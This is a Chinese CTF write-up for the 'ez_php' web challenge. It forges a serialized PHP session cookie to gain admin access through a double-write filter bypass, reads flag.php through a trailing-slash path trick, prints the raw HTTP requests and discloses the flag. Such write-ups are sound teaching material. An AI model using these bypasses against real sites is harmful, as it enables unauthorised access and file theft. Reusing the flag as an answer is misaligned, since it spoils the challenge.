Web
ez_php
题目给了一个地址,可以进行访问
首先我们进入题目地址发现是一个登陆页面:
我用burp进行抓包:
可以在GET传参发现cookie:
1
| TzoxMjoiU2Vzc2lvblxVc2VyIjoxOntzOjIyOiIAU2Vzc2lvblxVc2VyAHVzZXJuYW1lIjtzOjU6Imd1ZXN0Ijt9
|
通过Base64解码可以得到:
关于现在的cookie是guest权限,可以试试反序列化进行伪造,使得我们拥有admin权限,于是将guest改成admin再进行传参(这时会发现字节数有误,即admin应该是被系统检测删去了),这时可以尝试在一连字串里面夹杂admin,发现双写和isAdmin都可以进行替换
于是尝试双写绕过:
1
2
3
4
5
6
7
8
9
10
| Cookie: identification=TzoxMjoiU2Vzc2lvblxVc2VyIjoxOntzOjIyOiIAU2Vzc2lvblxVc2VyAHVzZXJuYW1lIjtzOjU6ImFkYWRtaW5taW4iO30=
得到:
HTTP/1.1 302 Found
Server: nginx/1.22.1
Date: Sat, 13 Dec 2025 04:55:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.33
Location: dashboard.php
Content-Length: 0
|
发现:Location: dashboard.php,即我们获取了admin权限
接着我们访问下dashboard.php:
1
2
3
4
5
6
7
8
9
| GET /dashboard.php HTTP/1.1
Host: 192.168.18.22:25005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.18.22:25005/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: identification=TzoxMjoiU2Vzc2lvblxVc2VyIjoxOntzOjIyOiIAU2Vzc2lvblxVc2VyAHVzZXJuYW1lIjtzOjU6ImFkYWRtaW5taW4iO30=
Connection: close
|
看上去我们有文件需要读取,于是用disearch扫描一下看看
发现有flag.php,试试能不能直接读,dashboard.php?filename=flag.php
发现不行,试了下斜杠绕过dashboard.php?filename=flag.php/
完整:
1
2
3
4
5
6
7
8
9
| GET /dashboard.php?filename=flag.php/ HTTP/1.1
Host: 192.168.18.22:25005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.18.22:25005/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: identification=TzoxMjoiU2Vzc2lvblxVc2VyIjoxOntzOjIyOiIAU2Vzc2lvblxVc2VyAHVzZXJuYW1lIjtzOjU6ImFkYWRtaW5taW4iO30=
Connection: close
|
得到flag:
在源码的noticeboard那里找到并复制提交
flag=’flag{8fee436d-176e-4b69-80ce-3b2ed0eee331}’
